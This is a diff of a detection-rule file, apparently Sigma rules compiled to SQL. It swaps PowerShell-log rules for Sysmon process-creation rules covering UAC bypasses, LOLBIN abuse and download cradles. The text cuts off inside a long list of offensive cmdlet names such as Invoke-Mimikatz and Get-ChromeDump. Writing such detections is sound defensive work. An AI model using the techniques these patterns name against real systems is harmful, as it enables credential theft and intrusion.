"754ed792-634f-40ae-b3bc-e0448d33f695", "status": "test", - "description": "Detects alternate PowerShell hosts potentially bypassing detections looking for powershell.exe", - "author": "Roberto Rodriguez @Cyb3rWard0g", + "description": "Detects a suspicious or uncommon parent processes of PowerShell", + "author": "Teymur Kheirkhabarov, Harish Segar", "tags": [ "attack.execution", "attack.t1059.001" ], "falsepositives": [ - "Programs using PowerShell directly without invocation of a dedicated interpreter", - "MSP Detection Searcher", - "Citrix ConfigSync.ps1" + "Other scripts" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '400' AND Channel = 'Windows PowerShell') AND HostApplication LIKE '%' ESCAPE '\\' AND NOT (HostApplication LIKE 'C:\\\\WINDOWS\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe%' ESCAPE '\\' OR ContextInfo LIKE '%Citrix\\\\ConfigSync\\\\ConfigSync.ps1%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%tomcat%' ESCAPE '\\' OR (ParentImage LIKE '%\\\\amigo.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\browser.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\chrome.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\firefox.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\httpd.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\iexplore.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\jbosssvc.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\microsoftedge.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\microsoftedgecp.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\MicrosoftEdgeSH.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\mshta.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\nginx.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\outlook.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\php-cgi.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\safari.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\services.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\sqlagent.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\sqlserver.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\sqlservr.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\vivaldi.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\w3wp.exe' ESCAPE '\\')) AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR (CommandLine LIKE '%/c powershell%' ESCAPE '\\' OR CommandLine LIKE '%/c pwsh%' ESCAPE '\\') OR Description = 'Windows PowerShell' OR Product = 'PowerShell Core 6' OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')))" ], - "filename": "posh_pc_alternate_powershell_hosts.yml" + "filename": "proc_creation_win_powershell_susp_parent_process.yml" }, { - "title": "PowerShell Downgrade Attack - PowerShell", - "id": "6331d09b-4785-4c13-980f-f96661356249", + "title": "Files And Subdirectories Listing Using Dir", + "id": "7c9340a9-e2ee-4e43-94c5-c54ebbea1006", "status": "experimental", - "description": "Detects PowerShell downgrade attack by comparing the host versions with the actually used engine version 2.0", - "author": "Florian Roth (Nextron Systems), Lee Holmes (idea), Harish Segar (improvements)", + "description": "Detects usage of the \"dir\" command that's part of windows batch/cmd to collect information about directories", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.execution", - "attack.t1059.001" + "attack.discovery", + "attack.t1217" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '400' AND Channel = 'Windows PowerShell') AND EngineVersion LIKE '2.%' ESCAPE '\\' AND NOT (HostVersion LIKE '2.%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%dir %' ESCAPE '\\' AND CommandLine LIKE '% /s%' ESCAPE '\\' AND CommandLine LIKE '% /b%' ESCAPE '\\')" ], - "filename": "posh_pc_downgrade_attack.yml" + "filename": "proc_creation_win_cmd_dir_execution.yml" }, { - "title": "Nslookup PowerShell Download Cradle", - "id": "999bff6d-dc15-44c9-9f5c-e1051bfc86e1", + "title": "Suspicious Recursive Takeown", + "id": "554601fb-9b71-4bcc-abf4-21a611be4fde", "status": "experimental", - "description": "Detects suspicious powershell download cradle using nslookup. This cradle uses nslookup to extract payloads from DNS records", - "author": "Sai Prashanth Pulisetti @pulisettis, Aishwarya Singam", + "description": "Adversaries can interact with the DACLs using built-in Windows commands takeown which can grant adversaries higher permissions on specific files and folders", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.defense_evasion", + "attack.t1222.001" ], "falsepositives": [ - "Unknown" + "Scripts created by developers and admins", + "Administrative activity" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '400' AND Channel = 'Windows PowerShell' AND HostApplication LIKE '%powershell%' ESCAPE '\\' AND HostApplication LIKE '%nslookup%' ESCAPE '\\' AND (HostApplication LIKE '%-q=txt%' ESCAPE '\\' OR HostApplication LIKE '%-querytype=txt%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\takeown.exe' ESCAPE '\\' AND CommandLine LIKE '%/f %' ESCAPE '\\' AND CommandLine LIKE '%/r%' ESCAPE '\\')" ], - "filename": "posh_pc_abuse_nslookup_with_dns_records.yml" + "filename": "proc_creation_win_takeown_recursive_own.yml" }, { - "title": "Netcat The Powershell Version", - "id": "c5b20776-639a-49bf-94c7-84f912b91c15", + "title": "TrustedPath UAC Bypass Pattern", + "id": "4ac47ed3-44c2-4b1f-9d51-bf46e8914126", "status": "test", - "description": "Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network", - "author": "frack113", + "description": "Detects indicators of a UAC bypass method by mocking directories", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1095" + "attack.defense_evasion", + "attack.t1548.002" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '400' AND Channel = 'Windows PowerShell' AND (HostApplication LIKE '%powercat %' ESCAPE '\\' OR HostApplication LIKE '%powercat.ps1%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%C:\\\\Windows \\\\System32\\\\%' ESCAPE '\\')" ], - "filename": "posh_pc_powercat.yml" + "filename": "proc_creation_win_uac_bypass_trustedpath.yml" }, { - "title": "Renamed Powershell Under Powershell Channel", - "id": "30a8cb77-8eb3-4cfb-8e79-ad457c5a4592", + "title": "OpenWith.exe Executes Specified Binary", + "id": "cec8e918-30f7-4e2d-9bfa-a59cc97ae60f", "status": "test", - "description": "Detects renamed powershell", - "author": "Harish Segar, frack113", + "description": "The OpenWith.exe executes other binary", + "author": "Beyu Denis, oscd.community (rule), @harr0ey (idea)", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ "Unknown" ], - "level": "low", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '400' AND Channel = 'Windows PowerShell') AND HostName = 'ConsoleHost' AND NOT ((HostApplication LIKE 'powershell.exe%' ESCAPE '\\' OR HostApplication LIKE 'C:\\\\WINDOWS\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\OpenWith.exe' ESCAPE '\\' AND CommandLine LIKE '%/c%' ESCAPE '\\')" ], - "filename": "posh_pc_renamed_powershell.yml" + "filename": "proc_creation_win_lolbin_openwith.yml" }, { - "title": "Abusable Invoke-ATHRemoteFXvGPUDisablementCommand - PowerShell Module", - "id": "38a7625e-b2cb-485d-b83d-aff137d859f4", + "title": "User Discovery And Export Via Get-ADUser Cmdlet", + "id": "1114e048-b69c-4f41-bc20-657245ae6e3f", "status": "experimental", - "description": "RemoteFXvGPUDisablement.exe is an abusable, signed PowerShell host executable that was introduced in Windows 10 and Server 2019 (OS Build 17763.1339).", - "author": "frack113", + "description": "Detects usage of the Get-ADUser cmdlet to collect user information and output it to a file", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218" + "attack.discovery", + "attack.t1033" ], "falsepositives": [ - "Unknown" + "Legitimate admin scripts may use the same technique, it's better to exclude specific computers or users who execute these commands or scripts often" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ContextInfo LIKE '%Invoke-ATHRemoteFXvGPUDisablementCommand %' ESCAPE '\\' AND (ContextInfo LIKE '%-ModuleName %' ESCAPE '\\' OR ContextInfo LIKE '%-ModulePath %' ESCAPE '\\' OR ContextInfo LIKE '%-ScriptBlock %' ESCAPE '\\' OR ContextInfo LIKE '%-RemoteFXvGPUDisablementFilePath%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%Get-ADUser %' ESCAPE '\\' AND CommandLine LIKE '% -Filter \\*' ESCAPE '\\' AND (CommandLine LIKE '% > %' ESCAPE '\\' OR CommandLine LIKE '% | Select %' ESCAPE '\\' OR CommandLine LIKE '%Out-File%' ESCAPE '\\' OR CommandLine LIKE '%Set-Content%' ESCAPE '\\' OR CommandLine LIKE '%Add-Content%' ESCAPE '\\')))" ], - "filename": "posh_pm_susp_athremotefxvgpudisablementcommand.yml" + "filename": "proc_creation_win_powershell_user_discovery_get_aduser.yml" }, { - "title": "Suspicious PowerShell Invocations - Generic - PowerShell Module", - "id": "bbb80e91-5746-4fbe-8898-122e2cafdbf4", + "title": "New Network Trace Capture Started Via Netsh.EXE", + "id": "d3c3861d-c504-4c77-ba55-224ba82d0118", + "status": "test", + "description": "Detects the execution of netsh with the \"trace\" flag in order to start a network capture", + "author": "Kutepov Anton, oscd.community", + "tags": [ + "attack.discovery", + "attack.credential_access", + "attack.t1040" + ], + "falsepositives": [ + "Legitimate administration activity" + ], + "level": "medium", + "rule": [ + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\netsh.exe' ESCAPE '\\' OR OriginalFileName = 'netsh.exe') AND (CommandLine LIKE '%trace%' ESCAPE '\\' AND CommandLine LIKE '%start%' ESCAPE '\\'))" + ], + "filename": "proc_creation_win_netsh_packet_capture.yml" + }, + { + "title": "Php Inline Command Execution", + "id": "d81871ef-5738-47ab-9797-7a9c90cd4bfb", "status": "experimental", - "description": "Detects suspicious PowerShell invocation command parameters", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects execution of php using the \"-r\" flag. This is could be used as a way to launch a reverse shell or execute live php code.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.execution", - "attack.t1059.001" + "attack.t1059" ], "falsepositives": [ - "Very special / sneaky PowerShell scripts" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ContextInfo LIKE '% -enc %' ESCAPE '\\' OR ContextInfo LIKE '% -EncodedCommand %' ESCAPE '\\' OR ContextInfo LIKE '% -ec %' ESCAPE '\\') AND (ContextInfo LIKE '% -w hidden %' ESCAPE '\\' OR ContextInfo LIKE '% -window hidden %' ESCAPE '\\' OR ContextInfo LIKE '% -windowstyle hidden %' ESCAPE '\\' OR ContextInfo LIKE '% -w 1 %' ESCAPE '\\') AND (ContextInfo LIKE '% -noni %' ESCAPE '\\' OR ContextInfo LIKE '% -noninteractive %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\php.exe' ESCAPE '\\' OR OriginalFileName = 'php.exe') AND CommandLine LIKE '% -r%' ESCAPE '\\')" ], - "filename": "posh_pm_susp_invocation_generic.yml" + "filename": "proc_creation_win_php_inline_command_execution.yml" }, { - "title": "Invoke-Obfuscation Via Use MSHTA - PowerShell Module", - "id": "07ad2ea8-6a55-4ac6-bf3e-91b8e59676eb", - "status": "experimental", - "description": "Detects Obfuscated Powershell via use MSHTA in Scripts", - "author": "Nikita Nazarov, oscd.community", + "title": "UAC Bypass Using Disk Cleanup", + "id": "b697e69c-746f-4a86-9f59-7bfff8eab881", + "status": "test", + "description": "Detects the pattern of UAC Bypass using scheduled tasks and variable expansion of cleanmgr.exe (UACMe 34)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload LIKE '%set%' ESCAPE '\\' AND Payload LIKE '%&&%' ESCAPE '\\' AND Payload LIKE '%mshta%' ESCAPE '\\' AND Payload LIKE '%vbscript:createobject%' ESCAPE '\\' AND Payload LIKE '%.run%' ESCAPE '\\' AND Payload LIKE '%(window.close)%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%\"\\\\system32\\\\cleanmgr.exe /autoclean /d C:' ESCAPE '\\' AND ParentCommandLine LIKE 'C:\\\\Windows\\\\system32\\\\svchost.exe -k netsvcs -p -s Schedule' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System'))" ], - "filename": "posh_pm_invoke_obfuscation_via_use_mhsta.yml" + "filename": "proc_creation_win_uac_bypass_cleanmgr.yml" }, { - "title": "SyncAppvPublishingServer Bypass Powershell Restriction - PS Module", - "id": "fe5ce7eb-dad8-467c-84a9-31ec23bd644a", + "title": "Windows Update Client LOLBIN", + "id": "d7825193-b70a-48a4-b992-8b5b3015cc11", "status": "experimental", - "description": "Detects SyncAppvPublishingServer process execution which usually utilized by adversaries to bypass PowerShell execution restrictions.", - "author": "Ensar Şamil, @sblmsrsn, OSCD Community", + "description": "Detects code execution via the Windows Update client (wuauclt)", + "author": "FPT.EagleEye Team", "tags": [ - "attack.defense_evasion", + "attack.command_and_control", + "attack.execution", + "attack.t1105", "attack.t1218" ], "falsepositives": [ - "App-V clients" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ContextInfo LIKE '%SyncAppvPublishingServer.exe%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\wuauclt.exe' ESCAPE '\\' OR OriginalFileName = 'wuauclt.exe') AND (CommandLine LIKE '%/UpdateDeploymentProvider%' ESCAPE '\\' AND CommandLine LIKE '%/RunHandlerComServer%' ESCAPE '\\' AND CommandLine LIKE '%.dll%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '% /ClassId %' ESCAPE '\\' OR CommandLine LIKE '% wuaueng.dll %' ESCAPE '\\')))" ], - "filename": "posh_pm_syncappvpublishingserver_exe.yml" + "filename": "proc_creation_win_wuauclt_execution.yml" }, { - "title": "Invoke-Obfuscation RUNDLL LAUNCHER - PowerShell Module", - "id": "a23791fe-8846-485a-b16b-ca691e1b03d4", + "title": "Potential COM Objects Download Cradles Usage - Process Creation", + "id": "02b64f1b-3f33-4e67-aede-ef3b0a5a8fcf", "status": "experimental", - "description": "Detects Obfuscated Powershell via RUNDLL LAUNCHER", - "author": "Timur Zinniatullin, oscd.community", - "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" - ], + "description": "Detects usage of COM objects that can be abused to download files in PowerShell by CLSID", + "author": "frack113", "falsepositives": [ - "Unknown" + "Legitimate use of the library" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload LIKE '%rundll32.exe%' ESCAPE '\\' AND Payload LIKE '%shell32.dll%' ESCAPE '\\' AND Payload LIKE '%shellexec\\_rundll%' ESCAPE '\\' AND Payload LIKE '%powershell%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%[Type]::GetTypeFromCLSID(%' ESCAPE '\\' AND (CommandLine LIKE '%0002DF01-0000-0000-C000-000000000046%' ESCAPE '\\' OR CommandLine LIKE '%F6D90F16-9C73-11D3-B32E-00C04F990BB4%' ESCAPE '\\' OR CommandLine LIKE '%F5078F35-C551-11D3-89B9-0000F81FE221%' ESCAPE '\\' OR CommandLine LIKE '%88d96a0a-f192-11d4-a65f-0040963251e5%' ESCAPE '\\' OR CommandLine LIKE '%AFBA6B42-5692-48EA-8141-DC517DCF0EF1%' ESCAPE '\\' OR CommandLine LIKE '%AFB40FFD-B609-40A3-9828-F88BBE11E4E3%' ESCAPE '\\' OR CommandLine LIKE '%88d96a0b-f192-11d4-a65f-0040963251e5%' ESCAPE '\\' OR CommandLine LIKE '%2087c2f4-2cef-4953-a8ab-66779b670495%' ESCAPE '\\' OR CommandLine LIKE '%000209FF-0000-0000-C000-000000000046%' ESCAPE '\\' OR CommandLine LIKE '%00024500-0000-0000-C000-000000000046%' ESCAPE '\\'))" ], - "filename": "posh_pm_invoke_obfuscation_via_rundll.yml" + "filename": "proc_creation_win_powershell_download_com_cradles.yml" }, { - "title": "Invoke-Obfuscation COMPRESS OBFUSCATION - PowerShell Module", - "id": "7034cbbb-cc55-4dc2-8dad-36c0b942e8f1", + "title": "Use of Pcalua For Execution", + "id": "0955e4e1-c281-4fb9-9ee1-5ee7b4b754d2", "status": "experimental", - "description": "Detects Obfuscated Powershell via COMPRESS OBFUSCATION", - "author": "Timur Zinniatullin, oscd.community", + "description": "Detects execition of commands and binaries from the context of The program compatibility assistant (Pcalua.exe). This can be used as a LOLBIN in order to bypass application whitelisting.", + "author": "Nasreddine Bencherchali (Nextron Systems), E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community", "tags": [ - "attack.defense_evasion", - "attack.t1027", "attack.execution", - "attack.t1059.001" + "attack.t1059" ], "falsepositives": [ - "Unknown" + "Legitimate use by a via a batch script or by an administrator." ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload LIKE '%new-object%' ESCAPE '\\' AND Payload LIKE '%text.encoding]::ascii%' ESCAPE '\\' AND (Payload LIKE '%system.io.compression.deflatestream%' ESCAPE '\\' OR Payload LIKE '%system.io.streamreader%' ESCAPE '\\') AND Payload LIKE '%readtoend' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\pcalua.exe' ESCAPE '\\' AND CommandLine LIKE '% -a%' ESCAPE '\\')" ], - "filename": "posh_pm_invoke_obfuscation_via_compress.yml" + "filename": "proc_creation_win_lolbin_pcalua.yml" }, { - "title": "Malicious PowerShell Commandlets - PoshModule", - "id": "7d0d0329-0ef1-4e84-a9f5-49500f9d7c6c", + "title": "Suspicious HH.EXE Execution", + "id": "e8a95b5e-c891-46e2-b33a-93937d3abc31", "status": "test", - "description": "Detects Commandlet names from well-known PowerShell exploitation frameworks", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects a suspicious execution of a Microsoft HTML Help (HH.exe)", + "author": "Maxim Pavlunin", "tags": [ + "attack.defense_evasion", "attack.execution", - "attack.discovery", - "attack.t1482", - "attack.t1087", - "attack.t1087.001", - "attack.t1087.002", - "attack.t1069.001", - "attack.t1069.002", - "attack.t1069", - "attack.t1059.001" + "attack.initial_access", + "attack.t1047", + "attack.t1059.001", + "attack.t1059.003", + "attack.t1059.005", + "attack.t1059.007", + "attack.t1218", + "attack.t1218.001", + "attack.t1218.010", + "attack.t1218.011", + "attack.t1566", + "attack.t1566.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (Payload LIKE '%Add-Exfiltration%' ESCAPE '\\' OR Payload LIKE '%Add-Persistence%' ESCAPE '\\' OR Payload LIKE '%Add-RegBackdoor%' ESCAPE '\\' OR Payload LIKE '%Add-RemoteRegBackdoor%' ESCAPE '\\' OR Payload LIKE '%Add-ScrnSaveBackdoor%' ESCAPE '\\' OR Payload LIKE '%Check-VM%' ESCAPE '\\' OR Payload LIKE '%ConvertTo-Rc4ByteStream%' ESCAPE '\\' OR Payload LIKE '%Decrypt-Hash%' ESCAPE '\\' OR Payload LIKE '%Do-Exfiltration%' ESCAPE '\\' OR Payload LIKE '%Enabled-DuplicateToken%' ESCAPE '\\' OR Payload LIKE '%Exploit-Jboss%' ESCAPE '\\' OR Payload LIKE '%Find-Fruit%' ESCAPE '\\' OR Payload LIKE '%Find-GPOLocation%' ESCAPE '\\' OR Payload LIKE '%Find-TrustedDocuments%' ESCAPE '\\' OR Payload LIKE '%Get-ApplicationHost%' ESCAPE '\\' OR Payload LIKE '%Get-ChromeDump%' ESCAPE '\\' OR Payload LIKE '%Get-ClipboardContents%' ESCAPE '\\' OR Payload LIKE '%Get-FoxDump%' ESCAPE '\\' OR Payload LIKE '%Get-GPPPassword%' ESCAPE '\\' OR Payload LIKE '%Get-IndexedItem%' ESCAPE '\\' OR Payload LIKE '%Get-Keystrokes%' ESCAPE '\\' OR Payload LIKE '%Get-LSASecret%' ESCAPE '\\' OR Payload LIKE '%Get-PassHashes%' ESCAPE '\\' OR Payload LIKE '%Get-RegAlwaysInstallElevated%' ESCAPE '\\' OR Payload LIKE '%Get-RegAutoLogon%' ESCAPE '\\' OR Payload LIKE '%Get-RemoteBootKey%' ESCAPE '\\' OR Payload LIKE '%Get-RemoteCachedCredential%' ESCAPE '\\' OR Payload LIKE '%Get-RemoteLocalAccountHash%' ESCAPE '\\' OR Payload LIKE '%Get-RemoteLSAKey%' ESCAPE '\\' OR Payload LIKE '%Get-RemoteMachineAccountHash%' ESCAPE '\\' OR Payload LIKE '%Get-RemoteNLKMKey%' ESCAPE '\\' OR Payload LIKE '%Get-RickAstley%' ESCAPE '\\' OR Payload LIKE '%Get-Screenshot%' ESCAPE '\\' OR Payload LIKE '%Get-SecurityPackages%' ESCAPE '\\' OR Payload LIKE '%Get-ServiceFilePermission%' ESCAPE '\\' OR Payload LIKE '%Get-ServicePermission%' ESCAPE '\\' OR Payload LIKE '%Get-ServiceUnquoted%' ESCAPE '\\' OR Payload LIKE '%Get-SiteListPassword%' ESCAPE '\\' OR Payload LIKE '%Get-System%' ESCAPE '\\' OR Payload LIKE '%Get-TimedScreenshot%' ESCAPE '\\' OR Payload LIKE '%Get-UnattendedInstallFile%' ESCAPE '\\' OR Payload LIKE '%Get-Unconstrained%' ESCAPE '\\' OR Payload LIKE '%Get-USBKeystrokes%' ESCAPE '\\' OR Payload LIKE '%Get-VaultCredential%' ESCAPE '\\' OR Payload LIKE '%Get-VulnAutoRun%' ESCAPE '\\' OR Payload LIKE '%Get-VulnSchTask%' ESCAPE '\\' OR Payload LIKE '%Gupt-Backdoor%' ESCAPE '\\' OR Payload LIKE '%HTTP-Login%' ESCAPE '\\' OR Payload LIKE '%Install-ServiceBinary%' ESCAPE '\\' OR Payload LIKE '%Install-SSP%' ESCAPE '\\' OR Payload LIKE '%Invoke-ACLScanner%' ESCAPE '\\' OR Payload LIKE '%Invoke-ADSBackdoor%' ESCAPE '\\' OR Payload LIKE '%Invoke-AllChecks%' ESCAPE '\\' OR Payload LIKE '%Invoke-ARPScan%' ESCAPE '\\' OR Payload LIKE '%Invoke-AzureHound%' ESCAPE '\\' OR Payload LIKE '%Invoke-BackdoorLNK%' ESCAPE '\\' OR Payload LIKE '%Invoke-BadPotato%' ESCAPE '\\' OR Payload LIKE '%Invoke-BetterSafetyKatz%' ESCAPE '\\' OR Payload LIKE '%Invoke-BypassUAC%' ESCAPE '\\' OR Payload LIKE '%Invoke-Carbuncle%' ESCAPE '\\' OR Payload LIKE '%Invoke-Certify%' ESCAPE '\\' OR Payload LIKE '%Invoke-ConPtyShell%' ESCAPE '\\' OR Payload LIKE '%Invoke-CredentialInjection%' ESCAPE '\\' OR Payload LIKE '%Invoke-DAFT%' ESCAPE '\\' OR Payload LIKE '%Invoke-DCSync%' ESCAPE '\\' OR Payload LIKE '%Invoke-DinvokeKatz%' ESCAPE '\\' OR Payload LIKE '%Invoke-DllInjection%' ESCAPE '\\' OR Payload LIKE '%Invoke-DomainPasswordSpray%' ESCAPE '\\' OR Payload LIKE '%Invoke-DowngradeAccount%' ESCAPE '\\' OR Payload LIKE '%Invoke-EgressCheck%' ESCAPE '\\' OR Payload LIKE '%Invoke-Eyewitness%' ESCAPE '\\' OR Payload LIKE '%Invoke-FakeLogonScreen%' ESCAPE '\\' OR Payload LIKE '%Invoke-Farmer%' ESCAPE '\\' OR Payload LIKE '%Invoke-Get-RBCD-Threaded%' ESCAPE '\\' OR Payload LIKE '%Invoke-Gopher%' ESCAPE '\\' OR Payload LIKE '%Invoke-Grouper%' ESCAPE '\\' OR Payload LIKE '%Invoke-HandleKatz%' ESCAPE '\\' OR Payload LIKE '%Invoke-ImpersonatedProcess%' ESCAPE '\\' OR Payload LIKE '%Invoke-ImpersonateSystem%' ESCAPE '\\' OR Payload LIKE '%Invoke-InteractiveSystemPowerShell%' ESCAPE '\\' OR Payload LIKE '%Invoke-Internalmonologue%' ESCAPE '\\' OR Payload LIKE '%Invoke-Inveigh%' ESCAPE '\\' OR Payload LIKE '%Invoke-InveighRelay%' ESCAPE '\\' OR Payload LIKE '%Invoke-KrbRelay%' ESCAPE '\\' OR Payload LIKE '%Invoke-LdapSignCheck%' ESCAPE '\\' OR Payload LIKE '%Invoke-Lockless%' ESCAPE '\\' OR Payload LIKE '%Invoke-MalSCCM%' ESCAPE '\\' OR Payload LIKE '%Invoke-Mimikatz%' ESCAPE '\\' OR Payload LIKE '%Invoke-Mimikittenz%' ESCAPE '\\' OR Payload LIKE '%Invoke-MITM6%' ESCAPE '\\' OR Payload LIKE '%Invoke-NanoDump%' ESCAPE '\\' OR Payload LIKE '%Invoke-NetRipper%' ESCAPE '\\' OR Payload LIKE '%Invoke-Nightmare%' ESCAPE '\\' OR Payload LIKE '%Invoke-NinjaCopy%' ESCAPE '\\' OR Payload LIKE '%Invoke-OfficeScrape%' ESCAPE '\\' OR Payload LIKE '%Invoke-OxidResolver%' ESCAPE '\\' OR Payload LIKE '%Invoke-P0wnedshell%' ESCAPE '\\' OR Payload LIKE '%Invoke-Paranoia%' ESCAPE '\\' OR Payload LIKE '%Invoke-PortScan%' ESCAPE '\\' OR Payload LIKE '%Invoke-PoshRatHttp%' ESCAPE '\\' OR Payload LIKE '%Invoke-PostExfil%' ESCAPE '\\' OR Payload LIKE '%Invoke-PowerDump%' ESCAPE '\\' OR Payload LIKE '%Invoke-PowerShellTCP%' ESCAPE '\\' OR Payload LIKE '%Invoke-PowerShellWMI%' ESCAPE '\\' OR Payload LIKE '%Invoke-PPLDump%' ESCAPE '\\' OR Payload LIKE '%Invoke-PsExec%' ESCAPE '\\' OR Payload LIKE '%Invoke-PSInject%' ESCAPE '\\' OR Payload LIKE '%Invoke-PsUaCme%' ESCAPE '\\' OR Payload LIKE '%Invoke-ReflectivePEInjection%' ESCAPE '\\' OR Payload LIKE '%Invoke-ReverseDNSLookup%' ESCAPE '\\' OR Payload LIKE '%Invoke-Rubeus%' ESCAPE '\\' OR Payload LIKE '%Invoke-RunAs%' ESCAPE '\\' OR Payload LIKE '%Invoke-SafetyKatz%' ESCAPE '\\' OR Payload LIKE '%Invoke-SauronEye%' ESCAPE '\\' OR Payload LIKE '%Invoke-SCShell%' ESCAPE '\\' OR Payload LIKE '%Invoke-Seatbelt%' ESCAPE '\\' OR Payload LIKE '%Invoke-ServiceAbuse%' ESCAPE '\\' OR Payload LIKE '%Invoke-ShadowSpray%' ESCAPE '\\' OR Payload LIKE '%Invoke-Sharp%' ESCAPE '\\' OR Payload LIKE '%Invoke-Shellcode%' ESCAPE '\\' OR Payload LIKE '%Invoke-SMBScanner%' ESCAPE '\\' OR Payload LIKE '%Invoke-Snaffler%' ESCAPE '\\' OR Payload LIKE '%Invoke-Spoolsample%' ESCAPE '\\' OR Payload LIKE '%Invoke-SpraySinglePassword%' ESCAPE '\\' OR Payload LIKE '%Invoke-SSHCommand%' ESCAPE '\\' OR 